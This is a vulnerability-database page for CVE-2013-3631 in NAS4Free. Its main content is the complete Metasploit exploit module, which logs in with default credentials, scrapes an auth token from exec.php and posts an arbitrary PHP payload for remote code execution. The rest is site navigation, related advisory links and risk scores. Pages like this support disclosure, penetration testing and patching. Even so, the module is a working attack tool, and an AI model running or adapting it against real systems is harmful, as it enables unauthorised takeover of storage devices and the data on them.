Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NAS4Free Arbitrary Remote Code Execution

🗓️ 30 Oct 2013 15:25:48Reported by Brandon Perry <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 26 Views

NAS4Free allows authenticated user to post PHP code to a special HTTP script for remote code execution. Successfully tested against version 9.1.0.1.804

Related
Code
ReporterTitlePublishedViews
Family
0day.today		NAS4Free Arbitrary Remote Code Execution Vulnerability
31 Oct 201300:00
zdt
Circl		CVE-2013-3631
31 Oct 201300:00
circl
Check Point Advisories		NAS4Free exec.php Arbitrary Remote Code Execution (CVE-2013-3631)
21 May 201400:00
checkpoint_advisories
CVE		CVE-2013-3631
2 Nov 201319:00
cve
Cvelist		CVE-2013-3631
2 Nov 201319:00
cvelist
Exploit DB		NAS4Free - Remote Code Execution (Metasploit)
31 Oct 201300:00
exploitdb
NVD		CVE-2013-3631
2 Nov 201319:55
nvd
Packet Storm		NAS4Free Arbitrary Remote Code Execution
30 Oct 201300:00
packetstorm
Prion		Design/Logic Flaw
2 Nov 201319:55
prion
RedhatCVE		CVE-2013-3631
22 May 202508:41
redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rexml/document'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NAS4Free Arbitrary Remote Code Execution',
      'Description'    => %q{
      NAS4Free allows an authenticated user to post PHP code to a special HTTP script and have
      the code executed remotely. This module was successfully tested against NAS4Free version
      9.1.0.1.804. Earlier builds are likely to be vulnerable as well.
      },
      'Author'         => [
        'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-3631'],
          ['URL', 'https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats']
        ],
      'Payload'	=>
        {
          'Space' => 21244,
          'DisableNops' => true,
          'BadChars' => ''
        },
      'Targets'	=>
        [
          [ 'Automatic Target', { } ]
        ],
      'Privileged' => true,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'DisclosureDate' => '2013-10-30',
      'DefaultTarget' => 0))

      register_options([
        OptString.new('USERNAME', [ true, "Username to authenticate with", "admin"]),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", "nas4free"])
      ])
  end

  def exploit
    init = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/')
    })

    sess = init.get_cookies

    post = {
      'username' => datastore["USERNAME"],
      'password' => datastore["PASSWORD"]
    }

    login = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/login.php'),
      'vars_post' => post,
      'cookie' => sess
    })

    if !login or login.code != 302
      fail_with(Failure::NoAccess, "Login failed")
    end

    exec_resp = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/exec.php'),
      'cookie' => sess
    })

    if !exec_resp or exec_resp.code != 200
      fail_with(Failure::UnexpectedReply, 'Error getting auth token from exec.php')
    end

    authtoken = ''
    #The html returned is not well formed, so I can't parse it with rexml
    exec_resp.body.each_line do |line|
      next if line !~ /authtoken/
      authtoken = line
    end

    doc = REXML::Document.new authtoken
    input = doc.root

    if !input
      fail_with(Failure::UnexpectedReply, 'Error getting auth token')
    end

    token = input.attributes["value"]

    data = Rex::MIME::Message.new
    data.add_part('', nil, nil, 'form-data; name="txtCommand"')
    data.add_part('', nil, nil, 'form-data; name="txtRecallBuffer"')
    data.add_part('', nil, nil, 'form-data; name="dlPath"')
    data.add_part('', 'application/octet-stream', nil, 'form-data; name="ulfile"; filename=""')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="txtPHPCommand"')
    #data.add_part(token, nil, nil, 'form-data; name="authtoken"')

    #I need to build the last data part by hand due to a bug in rex
    data_post = data.to_s
    data_post = data_post[0..data_post.length-data.bound.length-7]

    data_post << "\r\n--#{data.bound}"
    data_post << "\r\nContent-Disposition: form-data; name=\"authtoken\"\r\n\r\n"
    data_post << token
    data_post << "\r\n--#{data.bound}--\r\n\r\n"

    resp = send_request_raw({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/exec.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data_post,
      'cookie' => sess
    })
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Feb 2022 23:22Current
0.4Low risk
Vulners AI Score0.4
CVSS 26
EPSS0.49365
nas4freeauthenticated userphp codehttp scriptremote code executionversion 9.1.0.1.804cve-2013-3631rapid7 blog
26